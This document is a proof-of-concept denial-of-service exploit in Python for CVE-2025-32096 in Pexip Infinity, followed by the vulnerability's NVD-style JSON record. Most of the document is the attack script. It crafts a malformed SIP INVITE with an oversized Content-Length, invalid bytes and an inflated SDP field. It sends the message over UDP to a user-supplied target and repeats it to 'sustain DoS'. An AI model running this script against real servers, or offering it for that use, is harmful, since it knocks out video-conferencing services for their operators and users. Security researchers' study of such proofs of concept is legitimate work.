CVE-2025-32096

#!/usr/bin/env python3 """ CVE-2025-32096 PoC - Pexip Infinity Signaling DoS This PoC demonstrates improper input validation in Pexip Infinity signaling that can trigger software abort leading to denial of service. """ import socket import struct import sys import time def create_malicious_signaling_message(): """ Create a malformed signaling message that triggers input validation failure """ # SIP-like malformed message with invalid fields message = b"INVITE sip:target@pexip-server SIP/2.0\r\n" message += b"Via: SIP/2.0/UDP attacker:5060\r\n" message += b"From: <sip:[email protected]>\r\n" message += b"To: <sip:target@pexip-server>\r\n" message += b"Call-ID: malformed-call-id-with-invalid-chars-\x00\xff\r\n" message += b"CSeq: 1 INVITE\r\n" # Malformed SDP with invalid content message += b"Content-Type: application/sdp\r\n" message += b"Content-Length: 999999\r\n" # Oversized content-length message += b"\r\n" message += b"v=0\r\n" message += b"o=- " + b"A"*1000 + b" 0 IN IP4 127.0.0.1\r\n" # Oversized field message += b"s=-\r\n" message += b"c=IN IP4 0.0.0.0\r\n" # Add malformed RTPP packets message += b"a=rtpmap:99 invalid/90000\r\n" return message def exploit_cve_2025_32096(target_ip, target_port=5060): """ Send malicious signaling message to trigger DoS """ print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Creating malicious signaling message...") payload = create_malicious_signaling_message() try: print(f"[*] Sending malformed signaling message...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sock.sendto(payload, (target_ip, target_port)) print(f"[+] Payload sent ({len(payload)} bytes)") # Wait and check if server responds time.sleep(1) # Send follow-up malformed messages to sustain DoS for i in range(5): sock.sendto(payload, (target_ip, target_port)) time.sleep(0.5) sock.close() print(f"[+] Attack completed - server should trigger abort") return True except socket.error as e: print(f"[-] Socket error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060 exploit_cve_2025_32096(target, port)

{"cve": {"id": "CVE-2025-32096", "sourceIdentifier": "[email protected]", "published": "2025-12-25T05:16:07.057", "lastModified": "2026-01-05T19:29:09.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pexip Infinity 33.0 through 37.0 before 37.1 has improper input validation in signaling that allows an attacker to trigger a software abort, resulting in a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:*", "versionStartIncluding": "33.0", "versionEndExcluding": "37.1", "matchCriteriaId": "835A952D-9E3C-4D67-A3AC-78678C039CD2"}]}]}], "references": [{"url": "https://docs.pexip.com/admin/security_bulletins.htm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}